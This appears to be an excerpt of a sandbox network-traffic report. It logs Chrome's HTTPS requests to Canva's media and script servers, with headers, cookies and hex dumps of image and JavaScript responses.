                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 01 6b 28 70 00 70 10 70 20 70 30 70 19 c4 cb 2e 4c 08 0e 08 0e 1c ae 78 7f a0 4f 40 7e 60 11 8a 57 ce 4f 6e 1c 1b 2b a4 34 08 1b cf 27 69 9b ef 08 a9 0c 84 8d e7 93 74 dc 11 52 19 08 1b c7 24 b5 a1 11 52 82 50 9c 0f d3 9c 8f 11 08 9b 0f d3 99 b7 48 29 09 1b e6 f3 a1 45 e9 91 24 13 c7 38 8a ae 09 2d 9e 85 92 27 84 47 4b 20 ce 67 d0 b0 67 b0 07 b0 a7 b0 1b 30 08 68 b1 26 31 7a d8 4f 28 d8 23 d8 5b 18 24 60 15 b0 06 02 bb 0d 05 bb 0f 7b 09 f3 2b db 30 5e d8 1d d8 63 d8 13 d8 55 68 06 a8 1c 58 10 5e 94 11 52 0d 84 1c 60 92 30 62 18 2a 0c 1c fa 0d fd 81 41 c1 d0 61 54 50 19 ac 23 a4 a4 24 14 07 26 01 23 82 b4 81 42 bf 60 40 30 34 18 09 b4 0c d6 82 92 23 14 03 43 fe 5b ff c5 ff e4 23 af 3e b3 32 04 63 41 00 a2 36 05 60 49 b7 48 55 c8 e0 28 d2 29 64 63 01 83 af
                                                                                                                                                                                                                                                                    Data Ascii: k(ppp p0p.LxO@~`WOn+4'itR$RPH)E$8-'GK gg0h&1zO(#[$`{+0^cUhX^R`0b*AaTP#$&#B`@04#C[#>2cA6`IHU()dc
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 60 50 2d 12 cb 8b 1c 19 16 81 ac 73 2e bf 93 75 e1 cf 49 d2 22 ff 89 2a e4 c5 22 25 5b 44 02 e2 4c 69 aa ba de 19 23 48 2e 9e 0e fc a8 ba 2a 2f 21 d2 69 f8 0f 45 7e e4 1f 9e 42 65 fc 71 d4 5c 80 24 73 d7 47 19 d7 f5 8a f5 0b dc 20 0d 82 73 fd c8 0d aa 95 4b 5e a6 eb 44 e1 70 7c ed 64 64 e5 fd 48 6d 84 12 89 38 83 85 a5 97 c6 4a 6f 04 21 92 14 4a 66 20 11 f2 88 94 16 21 67 74 88 10 72 46 7e 23 24 09 a5 22 90 33 4a 97 9c 51 cd 24 94 3c 79 48 48 12 12 7e ad 14 51 5a 94 b4 ff 08 39 a3 2e 46 c8 11 94 1e a1 a4 e8 50 47 20 67 54 0b 42 89 28 05 09 39 e3 35 09 79 46 4a 9b 50 22 f2 c1 f1 4c 10 b0 72 b6 62 93 ef b9 85 e6 93 21 41 86 77 1a 0a 6e de 03 ad 1d 25 37 ce c7 9d 72 69 2c 92 73 04 58 10 0e e3 81 67 5a 19 58 25 89 a5 e5 b6 2b c4 a2 b1 fe 03 56 a0 7c 6e 18 5f
                                                                                                                                                                                                                                                                    Data Ascii: `P-s.uI"*"%[DLi#H.*/!iE~Beq\$sG sK^Dp|ddHm8Jo!Jf !gtrF~#$"3JQ$<yHH~QZ9.FPG gTB(95yFJP"Lrb!Awn%7ri,sXgZX%+V|n_
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: f7 cd 5b 37 6f 2d 92 03 96 71 97 ae 5b 37 6f dd 34 e4 24 e2 c5 97 be cb 7a 9e 1c 79 47 c2 02 a3 06 1e 1c 3d e6 cd 07 2e 7e 66 e5 34 30 42 c9 c4 95 eb d6 f5 af 43 96 f0 85 09 17 8f be ef b6 3d 48 20 64 61 e1 fb cb 46 5f 3f ec 8b 6f cf 7a 63 58 53 99 48 c8 81 37 7e a4 c7 d9 da 85 7d f8 25 8f 9e 30 24 44 16 25 13 db e6 5d fa 36 32 30 f1 b1 9e db 9f 66 23 67 99 8f e4 0f 48 86 27 5a 0a d9 ce 07 41 b2 0c be a1 b5 50 68 ff 57 24 91 4c 11 e7 e7 a3 79 79 b1 6b 21 0e 20 24 44 72 15 67 43 75 d3 0b ca 9d 2a 1e 2a ce ef 2c 14 3f 88 11 c9 a5 85 9b 73 91 77 7b 7a 88 79 66 90 57 68 df 6e bb 08 2c b3 ce 1d 87 8d 4d 5a e0 d6 4c 36 2a ff 2b 1b 31 48 74 b5 28 d9 eb 6e 2d 23 3d af 5a 1b 48 88 7c 1e 26 1a cb 29 bd 05 3c 09 f2 99 ff 3c 8e ac 9d 8b d9 35 e8 a4 7a f5 4e 76 1d 8e
                                                                                                                                                                                                                                                                    Data Ascii: [7o-q[7o4$zyG=.~f40BC=H daF_?ozcXSH7~}%0$D%]620f#gH'ZAPhW$Lyyk! $DrgCu**,?sw{zyfWhn,MZL6*+1Ht(n-#=ZH|&)<<5zNv
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 50 6e 7b 89 2c 55 de 6d 2f 54 df aa 4b 45 d2 8d c3 8b 41 70 44 5a 88 79 7f 73 b9 d4 79 6b 88 a0 f6 10 36 b4 48 e9 40 5c 56 8d bc c2 b9 e4 41 d6 98 d8 58 a1 ae 10 90 62 2e 29 47 5e fd a5 48 8a f9 22 53 28 94 f6 21 44 42 cc ce 6b db a3 fa 42 c3 8e d6 05 fb db 57 34 bb 4d d9 86 f9 8f 81 90 d3 ca 5d 5e 7d 6e 4c 0d 5e 0f dc 42 f5 c7 da ea 7d 52 83 9b 6d 68 6e 3b b2 d2 d2 5c 28 14 d6 cc 3f 80 90 83 35 c7 ef e8 ac af 74 8e 5f 91 d9 3b b6 be a1 c5 ad 14 1a 36 74 73 c0 f0 f9 f0 a8 92 3b 7d 30 36 19 31 bb f7 fb a5 f2 3b 16 25 5a 1e 1c db 5a 98 53 1d 3f be 7e 73 75 46 83 db e4 b7 df f0 0d 06 a5 eb d9 72 76 f2 83 e1 c3 ad d9 52 a9 52 ca 06 4f 10 22 c9 9a 4f 4b 9d a5 fa cc 8e 8e 41 c3 db 67 74 16 ea cb de b1 16 21 a7 98 9e 4d cd 85 4a b4 66 85 b7 b9 7e cd 8e 4c 7d 65
                                                                                                                                                                                                                                                                    Data Ascii: Pn{,Um/TKEApDZysyk6H@\VAXb.)G^H"S(!DBkBW4M]^}nL^B}Rmhn;\(?5t_;6ts;}061;%ZZS?~suFrvRRO"OKAgt!MJf~L}e
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: cb c6 cf 1a 4a fe bb d3 10 60 58 7d 6d 6b a5 d0 fa c4 d5 38 86 bb 2f 6c ad 64 cb 07 91 94 ae 4c a9 f5 e1 9b 9b eb db b3 27 9d 30 e1 8d 7b 96 23 11 73 d6 e4 5c c1 cd 1d bb 07 c7 8d bd e7 64 4a 51 53 7f 90 00 c3 f2 f5 9d 85 6c eb fa d3 0c 8e 83 a7 ac 9a 71 44 88 90 c4 75 7e 54 2a 56 be 5f 88 e3 e0 07 82 a0 94 e9 bb 0f 03 22 ce 37 b2 ed 42 bf 94 04 d1 38 d4 cf 76 ae 5f 8c 91 93 c4 75 cd a5 6c eb 73 c4 02 41 cf 5c b6 90 6b ba e3 00 8e ab 9f ce b8 d9 cc d0 59 d8 04 89 a5 b3 cb d9 28 f3 e8 5d 38 9a cf af 6a 28 04 b5 b4 36 3b fb b2 b3 16 e2 dc f8 e0 7e 3f aa 56 6e c3 d4 42 31 0a 72 51 ee 8c c7 46 90 18 0f 1c ee 47 5e 30 9a 18 67 f1 48 67 d6 2d 2e d8 ba 05 c7 51 af b4 47 6e f1 ce 3a 2b 21 c3 d9 7b ab 41 74 2e 12 20 c3 29 0d 59 ff a9 82 57 e8 8d 51 82 ad 1b d0 ee
                                                                                                                                                                                                                                                                    Data Ascii: J`X}mk8/ldL'0{#s\dJQSlqDu~T*V_"7B8v_ulsA\kY(]8j(6;~?VnB1rQFG^0gHg-.QGn:+!{At. )YWQ


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    102192.168.2.1249830104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:47 UTC941OUTGET /v2/image-resize/format:PNG/height:103/quality:100/uri:s3%3A%2F%2Fmedia-private.canva.com%2F_1h7c%2FMAGXBS_1h7c%2F1%2Fp.png/watermark:F/width:200?csig=AAAAAAAAAAAAAAAAAAAAACnFWDeI2NRpUVeqh9D2x3H-bJYfhhKLTqOrxo_xVEXT&exp=1732129969&osig=AAAAAAAAAAAAAAAAAAAAAOiwISUCqtQIuC3qHQC8BiIppp60e_dvY-XUn7C5tJ71&signer=media-rpc&x-canva-quality=thumbnail HTTP/1.1
                                                                                                                                                                                                                                                                    Host: media.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1205INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:47 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/webp
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59513e18b0de92-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 5811
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:33 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 13:24:56 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept, Origin
                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, OPTIONS
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    Cf-Bgj: imgq:85,h2pri
                                                                                                                                                                                                                                                                    Cf-Polished: origFmt=png, origSize=7458
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_media
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    x-request-id: 8e58c35acc418ccd
                                                                                                                                                                                                                                                                    Set-Cookie: __cf_bm=WIM6qfeTra6eQIFtARfguu7dE9Lxba_qADsM0yhVj24-1732114907-1.0.1.1-pIgyxK0Y1ZgB4_yFGWvkjDK95RUJtV6EdApHyItUr056eA0EPbusZ43CR0DqdyVSaCXMCho.asOXaptybrr4Yg; path=/; expires=Wed, 20-Nov-24 15:31:47 GMT; domain=.canva.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC507INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 37 70 58 63 47 6e 75 6b 70 63 66 31 74 44 51 47 73 6b 59 52 46 31 71 65 31 78 71 74 4d 45 63 4c 47 55 6d 4a 33 66 4d 4d 38 47 4b 69 74 61 53 70 53 75 38 72 58 51 45 66 68 33 55 69 76 72 34 78 43 35 4c 7a 32 47 30 63 6e 79 25 32 42 76 75 33 35 68 59 32 62 57 78 58 54 4b 72 49 59 52 34 42 4e 4d 64 62 61 61 65 4e 6a 48 74 70 4e 4a 32 6d 46 44 25 32 42 38 30 7a 6d 4b 42 6f 36 45 6c 4d 57 65 53 7a 41 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7pXcGnukpcf1tDQGskYRF1qe1xqtMEcLGUmJ3fMM8GKitaSpSu8rXQEfh3Uivr4xC5Lz2G0cny%2Bvu35hY2bWxXTKrIYR4BNMdbaaeNjHtpNJ2mFD%2B80zmKBo6ElMWeSzAA%3D%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 62 33 63 0d 0a 52 49 46 46 34 0b 00 00 57 45 42 50 56 50 38 4c 27 0b 00 00 2f c5 80 19 00 f5 86 e2 b6 6d 1c 7a ff b1 af d7 77 44 4c 80 7f 4d 13 a9 0f f5 36 18 d1 5b 28 23 71 61 69 d3 b6 1d 8f f3 6b ed dd da b6 1b d5 f6 9a b5 6d db b6 ad 35 de 4e d2 bb b6 32 b5 6d 5b e9 ea 4b ee da 76 af 89 a6 76 3f ed d4 ad 64 49 b6 4d db 9a f7 83 6d db b7 65 db b6 ed 7b 5f 0b ad 8b d6 c1 9a 7b 9f cd b5 75 b8 e4 d0 b6 ad d2 56 75 4e 5d ab ae 55 3d db b6 d1 ff 09 f0 fe fe ff ea 44 db b6 fd cb db b6 bb bb bb bb bb bb bb bb bb bb bb 8d cf b3 96 cd f5 19 61 4d 08 fb da b0 ad 30 99 05 84 4e 1a be a4 61 d8 19 09 5a 20 fd 00 61 24 85 e8 be b0 37 10 0d e9 d6 b1 c5 08 1a 4a 22 fa 3f 01 be 00 73 fc 3f 9d bc 0f 00 78 02 60 c8 27 02 80 99 62 60 84 76 22 20 c0 04 63 8c 56 a4 61 c6 ad
                                                                                                                                                                                                                                                                    Data Ascii: b3cRIFF4WEBPVP8L'/mzwDLM6[(#qaikm5N2m[Kvv?dIMme{_{uVuN]U=DaM0NaZ a$7J"?s?x`'b`v" cVa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC1369INData Raw: 7e fc 74 d6 67 7f 64 48 12 92 17 c9 78 62 2c 78 12 3d a7 aa e2 ab 8b 10 fb 62 5d 15 5f 7f 5a d7 76 c1 4c c1 c2 f7 9c 02 bc 07 ec 1c 38 fe f9 92 cb a7 d8 78 cc 4f 1e fb db e7 c4 4b 7e 73 be fe b9 23 35 8b a3 6b 49 f0 af 6c e6 42 d9 c0 af ab 3e 35 7b 62 b2 eb c0 b3 d6 3b 8f b1 91 64 f3 07 4f b9 b2 31 cb 33 7f 7e 77 f9 e3 cb ef 1e 82 fc ff 95 5e 1d a9 42 c9 68 fe 13 87 f2 1f f1 90 06 a6 2f 32 ff 96 7b 2a 99 64 ab ac 28 8e 7b f3 c2 65 26 ed 55 33 3a 3a ec 95 6e c3 1b eb 72 7b de f5 b1 99 0f fc ad ad 73 c7 83 fb fb 23 fc a3 86 9e 92 6f fd ec 95 3f a4 fc ae 6f 7f 65 e0 22 99 ea 2b f5 4e f2 e7 97 47 82 e7 c0 87 66 56 8f c3 f6 89 b5 f3 07 26 93 b3 b1 bb ba ce b7 ed e7 5b 7d 8c e7 55 45 47 c6 79 4e ef a3 46 d2 d3 2f 36 38 f7 98 0b ff 89 dc 83 df d6 7c b5 91 ff 36
                                                                                                                                                                                                                                                                    Data Ascii: ~tgdHxb,x=b]_ZvL8xOK~s#5kIlB>5{b;dO13~w^Bh/2{*d({e&U3::nr{s#o?oe"+NGfV&[}UEGyNF/68|6
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC145INData Raw: f2 36 5d 8a 0f ee 22 8b f6 1d 72 d5 dd f2 b5 5c f2 37 9f 73 d6 de f3 34 5e f3 b7 9c 0b 75 1e 0b b4 9f 0b 77 1d f3 35 5f 8a f4 1c 76 89 4b 5f 2f e8 a5 de 7f 5c 56 f1 78 29 2a 7e 49 cb 9f eb c3 9f 3d 5b fa f2 99 b8 f8 b5 40 54 f2 3e b6 ef d8 a2 e3 5f e8 95 b1 ea ff 5d a3 59 af 59 af 09 e1 7a 8d e6 fb b7 46 f7 92 56 8c e1 81 d9 ee 6f d6 e1 7f da e1 5f 2a e0 9b 4d c3 3d 13 4c 29 30 04 67 50 9a e1 a3 e0 a3 c0 37 c1 94 9a c3 40 00 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 6]"r\7s4^uw5_vK_/\Vx)*~I=[@T>_]YYzFVo_*M=L)0gP7@
                                                                                                                                                                                                                                                                    2024-11-20 15:01:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    103192.168.2.1249831104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1486OUTGET /chunk-batch/3e1e05ba24ee6f70.js+6d0e69feb99e4a90.js+60f63b285a3b4847.js+b2bb61a849e48145.js+c8a97d58e80df6e6.js+b68cf68769865eb5.js+edabeea6215279ba.js+131eb4392c201a0d.js+217c7ff3fe127f37.js+c2b308fb492f8999.js+bd755f9837164721.js+896e1adda18e46a3.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: chunk-composing.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 219912
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951492ef27c8a-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49964
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:35 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:15 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: KSMYt/AFncIb5oyg7Z1B6GdYTge0dqiKIo7Jxy7pER4GrIh6gzyS1fM0rGShmLyS2HsoMEBntzs=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: CPYJX6Y6BH2TTM87
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 4sRSSWwkWdOgwGR6zC4nDbT6TH3BqjnM
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC370INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 69 6b 4f 4a 49 25 32 46 44 66 6c 68 32 55 69 43 66 63 36 70 48 25 32 42 79 6a 42 4b 25 32 46 69 31 43 6e 38 53 50 70 68 38 50 50 56 6a 31 4c 62 4b 72 68 70 54 73 63 58 53 58 34 4e 35 41 25 32 42 62 64 75 6b 33 6c 4d 46 4f 6b 4c 4d 7a 70 5a 6f 48 34 79 39 41 4b 57 48 4f 25 32 42 36 68 52 30 4f 64 5a 6f 70 4c 76 42 54 31 6b 25 32 42 52 6d 65 43 73 55 74 74 35 4f 42 72 79 39 6f 75 55 34 25 32 42 31 4f 37 70 49 4f 69 71 54 6a 70 73 72 77 6f 6e 61 50 57 5a 68 57 46 79 49 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ikOJI%2FDflh2UiCfc6pH%2ByjBK%2Fi1Cn8SPph8PPVj1LbKrhpTscXSX4N5A%2Bbduk3lMFOkLMzpZoH4y9AKWHO%2B6hR0OdZopLvBT1k%2BRmeCsUtt5OBry9ouU4%2B1O7pIOiqTjpsrwonaPWZhWFyI%3D"}],"group":"cf-n
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1219INData Raw: 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 33 65 31 65 30 35 62 61 32 34 65 65 36 66 37 30 2e 6a 73 0a 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 39 37 36 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 33 37 36 36 39 39 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f
                                                                                                                                                                                                                                                                    Data Ascii: ;// __FILE_CONTENT_FOR__:3e1e05ba24ee6f70.js(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[9976],{/***/ 376699:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 5f 63 2e 77 28 28 6e 75 6c 6c 3d 3d 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 62 3d 64 2e 59 68 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 76 6f 69 64 20 30 3a 62 2e 74 79 70 65 29 3d 3d 3d 5f 5f 63 2e 71 77 29 3b 0a 62 3d 64 2e 59 68 2e 76 61 6c 75 65 3b 73 77 69 74 63 68 28 62 2e 74 79 70 65 29 7b 63 61 73 65 20 22 69 6e 76 61 6c 69 64 22 3a 62 3d 62 2e 61 69 61 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 63 61 6e 6f 6e 69 63 61 6c 22 3a 62 3d 62 2e 49 4f 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 42 28 62 29 3b 7d 5f 5f 63 2e 77 28 62 2e 73 74 61 72 74 73 57 69 74 68 28 22 3d 22 29 29 3b 63 6f 6e 73 74 20 65 3d 64 2e 4c 50 3b 62 3d 7b 74 79 70 65 3a 22 64 6f 6d 22 2c 72 65 6e 64
                                                                                                                                                                                                                                                                    Data Ascii: _c.w((null===d||void 0===d?void 0:null===(b=d.Yh)||void 0===b?void 0:b.type)===__c.qw);b=d.Yh.value;switch(b.type){case "invalid":b=b.aia;break;case "canonical":b=b.IO;break;default:throw new B(b);}__c.w(b.startsWith("="));const e=d.LP;b={type:"dom",rend
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 3a 62 2c 68 65 69 67 68 74 3a 63 2c 74 72 61 6e 73 66 6f 72 6d 3a 60 73 63 61 6c 65 28 24 7b 64 7d 29 60 7d 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 62 78 37 34 75 51 22 2c 63 68 69 6c 64 72 65 6e 3a 4c 38 28 5f 5f 63 2e 56 69 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 4d 38 28 7b 79 69 6d 6c 31 67 3a 65 2c 6f 59 6c 68 58 41 3a 66 7d 29 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 61 6c 69 67 6e 6d 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 61 7d 29 7d 29 7d 2c 77 59 63 3d 66 75 6e 63 74 69 6f 6e 28 7b 59 6b 3a 61 2c 68 69 67 68 6c 69 67 68 74 3a 62 2c 73 63 61 6c 65 3a 63 2c 50 41 3a 64 2c 55 71 3a 65 2c 50 32 61 3a 66 7d 29 7b 63 6f 6e 73 74 20 67 3d 4e 38 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6d 3d 0a 6e 75 6c 6c 3d 3d 3d 64 7c 7c 76 6f 69 64 20
                                                                                                                                                                                                                                                                    Data Ascii: :b,height:c,transform:`scale(${d})`},className:"bx74uQ",children:L8(__c.Vi,{className:M8({yiml1g:e,oYlhXA:f}),size:"small",alignment:"center",children:a})})},wYc=function({Yk:a,highlight:b,scale:c,PA:d,Uq:e,P2a:f}){const g=N8(()=>{const m=null===d||void
